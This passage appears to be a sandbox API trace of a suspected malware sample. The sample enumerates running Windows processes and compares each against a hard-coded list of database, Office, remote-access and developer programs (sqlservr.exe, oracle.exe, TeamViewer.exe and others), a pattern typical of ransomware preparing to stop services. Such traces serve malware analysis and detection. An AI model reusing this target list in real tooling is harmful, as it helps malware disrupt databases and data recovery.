lstrlenW (lpString="w3wp.exe") returned 8 [0076.140] lstrcmpiW (lpString1="System", lpString2="TeamViewer_Service.exe") returned -1 [0076.140] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.140] lstrcmpiW (lpString1="System", lpString2="TeamViewer.exe") returned -1 [0076.140] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.140] lstrcmpiW (lpString1="System", lpString2="SecomSDK.exe") returned 1 [0076.140] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.140] lstrcmpiW (lpString1="System", lpString2="schedul2.exe") returned 1 [0076.140] lstrlenW (lpString="schedul2.exe") returned 12 [0076.140] lstrcmpiW (lpString1="System", lpString2="schedhlp.exe") returned 1 [0076.140] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.140] lstrcmpiW (lpString1="System", lpString2="adm_tray.exe") returned 1 [0076.140] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.140] lstrcmpiW (lpString1="System", lpString2="EXCEL.EXE") returned 1 [0076.140] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.140] lstrcmpiW (lpString1="System", lpString2="MSACCESS.EXE") returned 1 [0076.141] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.141] lstrcmpiW (lpString1="System", lpString2="OUTLOOK.EXE") returned 1 [0076.141] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.141] lstrcmpiW (lpString1="System", lpString2="POWERPNT.EXE") returned 1 [0076.141] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.141] lstrcmpiW (lpString1="System", lpString2="AnyDesk.exe") returned 1 [0076.141] lstrlenW (lpString="AnyDesk.exe") returned 11 [0076.141] lstrcmpiW (lpString1="System", lpString2="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 1 [0076.141] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 61 [0076.141] lstrcmpiW (lpString1="System", lpString2="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0076.141] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 66 [0076.141] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0076.141] lstrcmpiW (lpString1="smss.exe", lpString2="sqlwriter.exe") returned -1 [0076.141] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.141] lstrcmpiW (lpString1="smss.exe", lpString2="sqlbrowser.exe") returned -1 [0076.141] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.141] lstrcmpiW (lpString1="smss.exe", lpString2="sqlservr.exe") returned -1 [0076.142] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="TNSLSNR.EXE") returned -1 [0076.142] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld.exe") returned 1 [0076.142] lstrlenW (lpString="mysqld.exe") returned 10 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="MsDtsSrvr.exe") returned 1 [0076.142] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="sqlceip.exe") returned -1 [0076.142] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="msmdsrv.exe") returned 1 [0076.142] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="mpdwsvc.exe") returned 1 [0076.142] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="fdlauncher.exe") returned 1 [0076.142] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="Launchpad.exe") returned 1 [0076.142] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0076.142] lstrlenW (lpString="chrome.exe") returned 10 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="oracle.exe") returned 1 [0076.142] lstrlenW (lpString="oracle.exe") returned 10 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="devenv.exe") returned 1 [0076.142] lstrlenW (lpString="devenv.exe") returned 10 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="PerfWatson2.exe") returned 1 [0076.142] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="ServiceHub.Host.Node.x86.exe") returned 1 [0076.142] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="Node.exe") returned 1 [0076.142] lstrlenW (lpString="Node.exe") returned 8 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned 1 [0076.142] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="Lightshot.exe") returned 1 [0076.142] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="netbeans64.exe") returned 1 [0076.142] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="spnsrvnt.exe") returned -1 [0076.142] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="sntlsrtsrvr.exe") returned -1 [0076.142] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="w3wp.exe") returned -1 [0076.142] lstrlenW (lpString="w3wp.exe") returned 8 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="TeamViewer_Service.exe") returned -1 [0076.142] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="TeamViewer.exe") returned -1 [0076.142] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.142] lstrcmpiW (lpString1="smss.exe", lpString2="SecomSDK.exe") returned 1 [0076.143] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="schedul2.exe") returned 1 [0076.143] lstrlenW (lpString="schedul2.exe") returned 12 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="schedhlp.exe") returned 1 [0076.143] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="adm_tray.exe") returned 1 [0076.143] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="EXCEL.EXE") returned 1 [0076.143] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="MSACCESS.EXE") returned 1 [0076.143] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="OUTLOOK.EXE") returned 1 [0076.143] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="POWERPNT.EXE") returned 1 [0076.143] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="AnyDesk.exe") returned 1 [0076.143] lstrlenW (lpString="AnyDesk.exe") returned 11 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 1 [0076.143] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 61 [0076.143] lstrcmpiW (lpString1="smss.exe", lpString2="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0076.143] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 66 [0076.143] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwriter.exe") returned -1 [0076.144] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlbrowser.exe") returned -1 [0076.144] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlservr.exe") returned -1 [0076.144] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="TNSLSNR.EXE") returned -1 [0076.144] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld.exe") returned -1 [0076.144] lstrlenW (lpString="mysqld.exe") returned 10 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="MsDtsSrvr.exe") returned -1 [0076.144] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlceip.exe") returned -1 [0076.144] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="msmdsrv.exe") returned -1 [0076.144] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="mpdwsvc.exe") returned -1 [0076.144] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="fdlauncher.exe") returned -1 [0076.144] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="Launchpad.exe") returned -1 [0076.144] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0076.144] lstrlenW (lpString="chrome.exe") returned 10 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="oracle.exe") returned -1 [0076.144] lstrlenW (lpString="oracle.exe") returned 10 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="devenv.exe") returned -1 [0076.144] lstrlenW (lpString="devenv.exe") returned 10 [0076.144] lstrcmpiW (lpString1="csrss.exe", lpString2="PerfWatson2.exe") returned -1 [0076.145] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="ServiceHub.Host.Node.x86.exe") returned -1 [0076.145] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="Node.exe") returned -1 [0076.145] lstrlenW (lpString="Node.exe") returned 8 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned -1 [0076.145] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="Lightshot.exe") returned -1 [0076.145] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="netbeans64.exe") returned -1 [0076.145] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="spnsrvnt.exe") returned -1 [0076.145] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="sntlsrtsrvr.exe") returned -1 [0076.145] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="w3wp.exe") returned -1 [0076.145] lstrlenW (lpString="w3wp.exe") returned 8 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="TeamViewer_Service.exe") returned -1 [0076.145] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="TeamViewer.exe") returned -1 [0076.145] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="SecomSDK.exe") returned -1 [0076.145] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="schedul2.exe") returned -1 [0076.145] lstrlenW (lpString="schedul2.exe") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="schedhlp.exe") returned -1 [0076.145] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="adm_tray.exe") returned 1 [0076.145] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="EXCEL.EXE") returned -1 [0076.145] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="MSACCESS.EXE") returned -1 [0076.145] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="OUTLOOK.EXE") returned -1 [0076.145] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="POWERPNT.EXE") returned -1 [0076.145] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.145] lstrcmpiW (lpString1="csrss.exe", lpString2="AnyDesk.exe") returned 1 [0076.146] lstrlenW (lpString="AnyDesk.exe") returned 11 [0076.146] lstrcmpiW (lpString1="csrss.exe", lpString2="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned -1 [0076.146] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 61 [0076.146] lstrcmpiW (lpString1="csrss.exe", lpString2="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0076.146] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 66 [0076.146] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlwriter.exe") returned 1 [0076.146] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlbrowser.exe") returned 1 [0076.146] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlservr.exe") returned 1 [0076.146] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="TNSLSNR.EXE") returned 1 [0076.146] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld.exe") returned 1 [0076.146] lstrlenW (lpString="mysqld.exe") returned 10 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="MsDtsSrvr.exe") returned 1 [0076.146] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlceip.exe") returned 1 [0076.146] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.146] lstrcmpiW (lpString1="wininit.exe", lpString2="msmdsrv.exe") returned 1 [0076.147] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="mpdwsvc.exe") returned 1 [0076.147] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="fdlauncher.exe") returned 1 [0076.147] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="Launchpad.exe") returned 1 [0076.147] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0076.147] lstrlenW (lpString="chrome.exe") returned 10 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="oracle.exe") returned 1 [0076.147] lstrlenW (lpString="oracle.exe") returned 10 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="devenv.exe") returned 1 [0076.147] lstrlenW (lpString="devenv.exe") returned 10 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="PerfWatson2.exe") returned 1 [0076.147] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="ServiceHub.Host.Node.x86.exe") returned 1 [0076.147] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="Node.exe") returned 1 [0076.147] lstrlenW (lpString="Node.exe") returned 8 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned 1 [0076.147] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="Lightshot.exe") returned 1 [0076.147] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="netbeans64.exe") returned 1 [0076.147] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="spnsrvnt.exe") returned 1 [0076.147] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="sntlsrtsrvr.exe") returned 1 [0076.147] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="w3wp.exe") returned 1 [0076.147] lstrlenW (lpString="w3wp.exe") returned 8 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="TeamViewer_Service.exe") returned 1 [0076.147] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="TeamViewer.exe") returned 1 [0076.147] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="SecomSDK.exe") returned 1 [0076.147] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.147] lstrcmpiW (lpString1="wininit.exe", lpString2="schedul2.exe") returned 1 [0076.148] lstrlenW (lpString="schedul2.exe") returned 12 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="schedhlp.exe") returned 1 [0076.148] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="adm_tray.exe") returned 1 [0076.148] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="EXCEL.EXE") returned 1 [0076.148] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="MSACCESS.EXE") returned 1 [0076.148] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="OUTLOOK.EXE") returned 1 [0076.148] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="POWERPNT.EXE") returned 1 [0076.148] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="AnyDesk.exe") returned 1 [0076.148] lstrlenW (lpString="AnyDesk.exe") returned 11 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 1 [0076.148] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 61 [0076.148] lstrcmpiW (lpString1="wininit.exe", lpString2="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0076.148] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 66 [0076.148] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwriter.exe") returned -1 [0076.149] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlbrowser.exe") returned -1 [0076.149] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlservr.exe") returned -1 [0076.149] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="TNSLSNR.EXE") returned -1 [0076.149] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld.exe") returned -1 [0076.149] lstrlenW (lpString="mysqld.exe") returned 10 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="MsDtsSrvr.exe") returned -1 [0076.149] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlceip.exe") returned -1 [0076.149] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="msmdsrv.exe") returned -1 [0076.149] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="mpdwsvc.exe") returned -1 [0076.149] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="fdlauncher.exe") returned -1 [0076.149] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="Launchpad.exe") returned -1 [0076.149] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0076.149] lstrlenW (lpString="chrome.exe") returned 10 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="oracle.exe") returned -1 [0076.149] lstrlenW (lpString="oracle.exe") returned 10 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="devenv.exe") returned -1 [0076.149] lstrlenW (lpString="devenv.exe") returned 10 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="PerfWatson2.exe") returned -1 [0076.149] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="ServiceHub.Host.Node.x86.exe") returned -1 [0076.149] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="Node.exe") returned -1 [0076.149] lstrlenW (lpString="Node.exe") returned 8 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned -1 [0076.149] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="Lightshot.exe") returned -1 [0076.149] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.149] lstrcmpiW (lpString1="csrss.exe", lpString2="netbeans64.exe") returned -1 [0076.150] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="spnsrvnt.exe") returned -1 [0076.150] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="sntlsrtsrvr.exe") returned -1 [0076.150] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="w3wp.exe") returned -1 [0076.150] lstrlenW (lpString="w3wp.exe") returned 8 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="TeamViewer_Service.exe") returned -1 [0076.150] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="TeamViewer.exe") returned -1 [0076.150] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="SecomSDK.exe") returned -1 [0076.150] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="schedul2.exe") returned -1 [0076.150] lstrlenW (lpString="schedul2.exe") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="schedhlp.exe") returned -1 [0076.150] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="adm_tray.exe") returned 1 [0076.150] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="EXCEL.EXE") returned -1 [0076.150] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="MSACCESS.EXE") returned -1 [0076.150] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="OUTLOOK.EXE") returned -1 [0076.150] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="POWERPNT.EXE") returned -1 [0076.150] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="AnyDesk.exe") returned 1 [0076.150] lstrlenW (lpString="AnyDesk.exe") returned 11 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned -1 [0076.150] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 61 [0076.150] lstrcmpiW (lpString1="csrss.exe", lpString2="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0076.150] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 66 [0076.150] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="sqlwriter.exe") returned 1 [0076.151] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="sqlbrowser.exe") returned 1 [0076.151] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="sqlservr.exe") returned 1 [0076.151] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="TNSLSNR.EXE") returned 1 [0076.151] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="mysqld.exe") returned 1 [0076.151] lstrlenW (lpString="mysqld.exe") returned 10 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="MsDtsSrvr.exe") returned 1 [0076.151] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="sqlceip.exe") returned 1 [0076.151] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="msmdsrv.exe") returned 1 [0076.151] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="mpdwsvc.exe") returned 1 [0076.151] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="fdlauncher.exe") returned 1 [0076.151] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="Launchpad.exe") returned 1 [0076.151] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0076.151] lstrlenW (lpString="chrome.exe") returned 10 [0076.151] lstrcmpiW (lpString1="winlogon.exe", lpString2="oracle.exe") returned 1 [0076.152] lstrlenW (lpString="oracle.exe") returned 10 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="devenv.exe") returned 1 [0076.152] lstrlenW (lpString="devenv.exe") returned 10 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="PerfWatson2.exe") returned 1 [0076.152] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.152] 